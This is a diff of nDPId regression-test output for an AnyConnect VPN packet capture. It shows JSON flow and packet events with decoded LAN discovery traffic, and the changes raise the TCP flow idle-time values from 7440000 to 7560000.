@@ -274,16 +274,16 @@ 00860{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":578,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1569687269223,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":353,"pkt_l4_len":319,"thread_ts_msec":1569687269223,"pkt":"NDY7z3Uo2DE0IHf7CABFAAFTj6FAAEARlH8KAACXCgAA4wds4MsBP0SkSFRUUC8xLjEgMjAwIE9LDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTM2MDANClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDoyOTVjMDAwNC02ODA3LTEwNmQtODBjZi1kODMxMzQyMDc3ZmI6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KRXh0OiANClNlcnZlcjogUm9rdSBVUG5QLzEuMCBSb2t1LzkuMS4wDQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNTE6ODA2MC9kaWFsL2RkLnhtbA0KV0FLRVVQOiBNQUM9ZDg6MzE6MzQ6MjA6Nzc6ZmI7VGltZW91dD0xMA0KDQo="} 00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":578,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269223,"flow_last_seen":1569687269223,"flow_idle_time":180000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687269223,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":57547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00681{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":678,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1569687269559,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1569687269559,"pkt":"AQBef\/\/6NDY7z3UoCABFAADKtRAAAAERCTYKAADj7\/\/\/+uDLB2wAtl89TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogR29vZ2xlIENocm9tZS83Ny4wLjM4NjUuOTAgTWFjIE9TIFgNCg0K"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269561,"flow_last_seen":1569687269561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687269561,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1569687269561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687269561,"pkt":"pHczjPFANDY7z3UoCABFAABAAABAAEAGJUEKAADjCgAAld56H0gqQcOaAAAAALAC\/\/9B2AAAAgQFtAEDAwUBAQgKHA3YAQAAAAAEAgAA"} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":681,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269562,"flow_last_seen":1569687269562,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687269562,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56955,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":681,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1569687269562,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687269562,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl957H3yCfYpEAAAAALAC\/\/8iuwAAAgQFtAEDAwUBAQgKHA3YAQAAAAAEAgAA"} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":682,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1569687269563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569687269563,"pkt":"NDY7z3UopHczjPFACABFAAA8AABAAEAGJUUKAACVCgAA4x9I3np8gG11KkHDm6ASOJBP2wAAAgQFtAQCCAoAIeBIHA3YAQEDAwY="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":1569687269563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687269563,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAld56H0gqQcObfIBtdoAQEBWnIAAAAQEIChwN2AIAIeBI"} -00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":684,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687269561,"flow_last_seen":1569687269563,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":251,"flow_tot_l4_payload_len":251,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1569687269563,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"CiscoVPN.HTTP","breed":"Acceptable","category":"Web"}} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1569687269567,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569687269567,"pkt":"NDY7z3Uo2DE0IHf7CABFAAA8AABAAEAGJUMKAACXCgAA4x983nsgu1W7gn2KRaASqbA3ZQAAAgQFtAQCCAoGktWOHA3YAQEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1569687269567,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687269567,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl957H3yCfYpFILtVvIAQEBX\/yAAAAQEIChwN2AUGktWO"} -01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687269562,"flow_last_seen":1569687269567,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569687269567,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56955,"dst_port":8060,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"10.0.0.151","url":"10.0.0.151:8060\/dial\/dd.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/77.0.3865.90 Safari\/537.36"}} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269561,"flow_last_seen":1569687269561,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687269561,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1569687269561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687269561,"pkt":"pHczjPFANDY7z3UoCABFAABAAABAAEAGJUEKAADjCgAAld56H0gqQcOaAAAAALAC\/\/9B2AAAAgQFtAEDAwUBAQgKHA3YAQAAAAAEAgAA"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":681,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269562,"flow_last_seen":1569687269562,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687269562,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56955,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":681,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1569687269562,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687269562,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl957H3yCfYpEAAAAALAC\/\/8iuwAAAgQFtAEDAwUBAQgKHA3YAQAAAAAEAgAA"} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":682,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1569687269563,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569687269563,"pkt":"NDY7z3UopHczjPFACABFAAA8AABAAEAGJUUKAACVCgAA4x9I3np8gG11KkHDm6ASOJBP2wAAAgQFtAQCCAoAIeBIHA3YAQEDAwY="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":1569687269563,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687269563,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAld56H0gqQcObfIBtdoAQEBWnIAAAAQEIChwN2AIAIeBI"} 
+00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":684,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687269561,"flow_last_seen":1569687269563,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":251,"flow_tot_l4_payload_len":251,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1569687269563,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"CiscoVPN.HTTP","breed":"Acceptable","category":"Web"}} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1569687269567,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569687269567,"pkt":"NDY7z3Uo2DE0IHf7CABFAAA8AABAAEAGJUMKAACXCgAA4x983nsgu1W7gn2KRaASqbA3ZQAAAgQFtAQCCAoGktWOHA3YAQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1569687269567,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687269567,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl957H3yCfYpFILtVvIAQEBX\/yAAAAQEIChwN2AUGktWO"} 
+01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687269562,"flow_last_seen":1569687269567,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569687269567,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56955,"dst_port":8060,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"10.0.0.151","url":"10.0.0.151:8060\/dial\/dd.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/77.0.3865.90 Safari\/537.36"}} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":706,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1569687269598,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":46,"pkt_l4_len":12,"thread_ts_msec":1569687269598,"pkt":"LH6BsEqhNDY7z3UoCABFAAAg\/t4AAEARZwsKAADjCgAAAc1zAMAADAmuEAEDEA=="} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":716,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269716,"flow_last_seen":1569687269716,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687269716,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":49816,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01132{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":716,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1569687269716,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":556,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":556,"pkt_l4_len":522,"thread_ts_msec":1569687269716,"pkt":"NDY7z3UopHczjPFACABFAAIeAABAAEARI1gKAACVCgAA48KY4MsCCjHASFRUUC8xLjEgMjAwIE9LDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTE4MDANCkRBVEU6IFNhdCwgMjggU2VwIDIwMTkgMTY6MTQ6MjkgR01UDQpFWFQ6DQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNDk6ODAwOC9zc2RwL2RldmljZS1kZXNjLnhtbA0KT1BUOiAiaHR0cDovL3NjaGVtYXMudXBucC5vcmcvdXBucC8xLzAvIjsgbnM9MDENCjAxLU5MUzogYjNiMTBmNmEtMWRkMS0xMWIyLWI3NDAtYWU5NDc5MzlkMzA4DQpTRVJWRVI6IExpbnV4LzMuOC4xMyssIFVQblAvMS4wLCBQb3J0YWJsZSBTREsgZm9yIFVQblAgZGV2aWNlcy8xLjYuMTgNClgtVXNlci1BZ2VudDogcmVkc29uaWMNClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDo3OWQ4OGU4My03MjVjLWI3MWItYmFkMC01ODYyZDViMjIzODY6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KQk9PVElELlVQTlAuT1JHOiA0NzINCkNPTkZJR0lELlVQTlAuT1JHOiAxDQoNCg=="} 
@@ -303,7 +303,7 @@ 00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1797,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687277139,"flow_last_seen":1569687277139,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1569687277139,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1798,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1569687277144,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1569687277144,"pkt":"\/\/\/\/\/\/\/\/NDY7z3UoCABFAABOK\/AAAEAROM4KAADjCgAA\/wCJAIkAOvmHRYABEAABAAAAAAAAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAAAgAAE="} 00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1809,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1569687277188,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1569687277188,"pkt":"\/\/\/\/\/\/\/\/NDY7z3UoCABFAABgQ9oAAEARINIKAADjCgAA\/wCJAIkATMRRRYEwEAABAAAAAAABIEVNRkFDTkVDREFERUREREFERkREQ05GSERIREdERUFBAAAgAAHADAAgAAEAAAAAAAZgAAoAAOM="} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2353,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1569687281158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687281158,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0UBJAAPMGvOUIJWfECgAA4wG73ieGjW4CDCXQ8YARTdYkXAAAAQEICnincgAcDdF\/"} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2353,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1569687281158,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687281158,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0UBJAAPMGvOUIJWfECgAA4wG73ieGjW4CDCXQ8YARTdYkXAAAAQEICnincgAcDdF\/"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2587,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687286917,"flow_last_seen":1569687286917,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687286917,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2587,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1569687286917,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1569687286917,"pkt":"AQBeAAD7pHczjPFACABFAABEAABAAP8RkBgKAACV4AAA+xTpFOkAMI4UAAAAAAABAAAAAAAAC19nb29nbGV6b25lBF90Y3AFbG9jYWwAAAwAAQ=="} 00688{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2587,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687286917,"flow_last_seen":1569687286917,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687286917,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlezone._tcp.local"}} 
@@ -315,19 +315,19 @@ 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2723,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1569687287737,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":16,"thread_ts_msec":1569687287737,"pkt":"AQBeAAABLH6BsEqhCABFwAAkGHoAAAEBtp0KAAAB4AAAAQkA5rYBAgVGCgAAAQAAAAAAAP\/\/Aiw="} 00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2723,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687287737,"flow_last_seen":1569687287737,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1569687287737,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":1.061278} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569687268559,"flow_last_seen":1569687271560,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":57547,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
-00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1569687249612,"flow_last_seen":1569687268122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":384,"flow_tot_l4_payload_len":3455,"flow_avg_l4_payload_len":181,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"}} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687240992,"flow_last_seen":1569687241009,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.53","src_port":56885,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687240992,"flow_last_seen":1569687241009,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.53","src_port":56885,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
